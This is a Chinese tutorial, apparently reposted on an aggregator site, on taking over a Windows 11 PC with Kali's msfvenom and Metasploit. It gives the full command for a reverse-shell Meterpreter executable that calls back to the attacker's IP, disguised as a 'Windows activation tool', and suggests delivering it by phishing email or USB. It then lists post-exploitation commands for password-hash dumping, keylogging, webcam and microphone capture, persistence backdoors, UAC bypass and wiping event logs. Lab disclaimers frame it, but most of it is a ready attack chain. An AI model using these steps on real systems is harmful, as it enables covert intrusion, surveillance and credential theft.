当前位置: 首页 > news >正文

Kali MSF渗透Windows 11电脑

实验前提:
本次渗透均在靶机内实现。未经授权使用 msfvenom 攻击他人系统属于 违法行为。请确保你是在 授权环境 下进行渗透测试。

本文章仅作技术参考

实验机型:
虚拟机:kali Linux
靶机: Windows 11专业版

1.获取IP

kali 终端内输入ifconfig获取kali 的ip

2.获取权限

使用su或者sudo su进入kali的root模式

3.生成payload文件(攻击端配置)

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<kali的IP> LPORT=<未被占用的端口> -f exe -o <payload文件名>.exe

  • kali的IP:由 步骤1 获取的 kali 网络IP 填入
  • 请在LPOTRT处填入未被占用的端口,如果选择的端口被占用,文件可能生成失败或报错
  • payload文件名自由填,例如”windows激活工具.exe“

假如我的IP是192.168.1.1

例:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=5200 -f exe -o Windows激活工具.exe

在这里插入图片描述
当显示这样的话,你就成功≥50%了。接下来,轮到下一步:

4.控制端配置

2. 后续使用步骤

(1)在 Kali 上启动 Metasploit 监听
msfconsole  # 进入 Metasploit 框架
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 你的kali IP
set LPORT 你的设置端口号
exploit 或者是 run

攻击端和控制端的IP和端口要一致

  • 此时 Kali 会监听 端口,等待目标运行 Love.exe 后建立连接。
(2)将 将生成的.exe 文件传输到目标 Windows 机器
  • 方法:通过 U 盘、钓鱼邮件、Web 下载等(需合法授权!)。
  • 目标运行后,Kali 会获得 Meterpreter Shell(完全控制权限)。

Meterpreter Shell命令:

当成功通过 msfvenom 生成的 payload (如 Love.exe) 入侵目标电脑并获得 Meterpreter 会话后,可以使用以下命令进行后续操作:

基础系统命令

  1. 系统信息

    sysinfo          # 查看目标系统信息
    getuid           # 显示当前权限
    getpid           # 显示当前进程ID
    ps               # 列出所有进程
    
  2. 文件系统操作

    pwd              # 查看当前目录
    cd [目录]         # 切换目录
    ls               # 列出文件
    download [文件]   # 下载文件到攻击机
    upload [本地文件] # 上传文件到目标
    search -f *.txt  # 搜索文件
    edit [文件]      # 编辑文件
    
  3. 网络操作

    ipconfig         # 查看网络配置
    portfwd          # 端口转发
    route            # 查看/修改路由表
    

权限提升命令

  1. 提权尝试

    getsystem        # 尝试提升到SYSTEM权限
    bypassuac        # 绕过UAC限制
    
  2. 权限维持

    migrate [PID]    # 迁移到其他进程
    run persistence  # 创建持久化后门
    

信息收集命令

  1. 密码获取

    hashdump         # 获取密码哈希
    run post/windows/gather/smart_hashdump # 更智能的哈希获取
    keyscan_start    # 开始键盘记录
    keyscan_dump     # 转储键盘记录
    
  2. 屏幕操作

    screenshot       # 截取屏幕
    record_mic       # 录制麦克风音频
    webcam_list      # 列出摄像头
    webcam_snap      # 拍摄摄像头照片
    

高级功能命令

  1. 后门植入

    run metsvc       # 安装Meterpreter服务
    run getgui -e    # 启用远程桌面
    
  2. 横向移动

    run post/windows/gather/enum_logged_on_users # 枚举登录用户
    run post/multi/manage/autoroute # 自动路由设置
    
  3. 清理痕迹

    clearev          # 清除事件日志
    timestomp        # 修改文件时间戳
    
会话管理命令
background        # 后台当前会话
sessions -l       # 列出所有会话
sessions -i [ID]  # 进入指定会话
exit              # 退出当前会话

重要提醒

⚠️ 法律与道德警示

  1. 这些命令仅限用于 合法授权的渗透测试
  2. 未经授权使用这些技术入侵他人系统属于 违法行为
  3. 在实际渗透测试中,必须获得 书面授权 才能进行
  4. 测试完成后应当 清理痕迹 并提交详细报告

请确保你是在合法授权的环境下使用这些命令。如需更详细的命令说明,可以在Meterpreter会话中使用help命令查看完整帮助文档。

http://www.lryc.cn/news/594579.html

相关文章:

  • Taro 路由相关 API 详解与实战
  • taro+pinia+小程序存储配置持久化
  • 微美全息(WIMI.US)聚焦多元哈希锁机制,为链上链下数据可信交互按下加速键
  • 快速入门SwiftUI
  • 【大模型】结构化提示词:让AI高效完成复杂任务的“编程语言”
  • JavaEE初阶第十期:解锁多线程,从 “单车道” 到 “高速公路” 的编程升级(八)
  • 经典神经网络(vgg resnet googlenet)
  • LiteCoT:难度感知的推理链压缩与高效蒸馏框架
  • Apache IoTDB(2):时序数据库 IoTDB 集群安装部署的技术优势与适用场景分析
  • 卫朋:华为流程体系拆解系列之高阶流程L1-L3分解三阶七步法
  • 深入详解随机森林在放射治疗计划优化中的应用及实现细节
  • 【Elasticsearch】BM25的discount_overlaps参数
  • Qt中的网络通信
  • Lua:小巧而强大的脚本语言,游戏与嵌入式的秘密武器
  • 搭建前端页面,介绍对应标签
  • wordle game(猜词游戏)小demo【react + ts】
  • 搭建种草商城框架指南
  • Protein FID:AI蛋白质结构生成模型评估新指标
  • MCP协议解析:如何通过Model Context Protocol 实现高效的AI客户端与服务端交互
  • 基础神经网络模型搭建
  • 【Linux】3. Shell语言
  • 双8无碳小车“cad【17张】三维图+设计说名书
  • XTTS实现语音克隆:精确控制音频格式与生成流程【TTS的实战指南】
  • XSS GAME靶场
  • 仙盟数据库应用-外贸标签打印系统 前端数据库-V8--毕业论文-—-—仙盟创梦IDE
  • Apache基础配置
  • ESMFold 安装教程
  • 深度相机的工作模式(以奥比中光深度相机为例)
  • 近期工作感想:职业规划篇
  • 【RAG Agent】Deep Searcher实现逻辑解析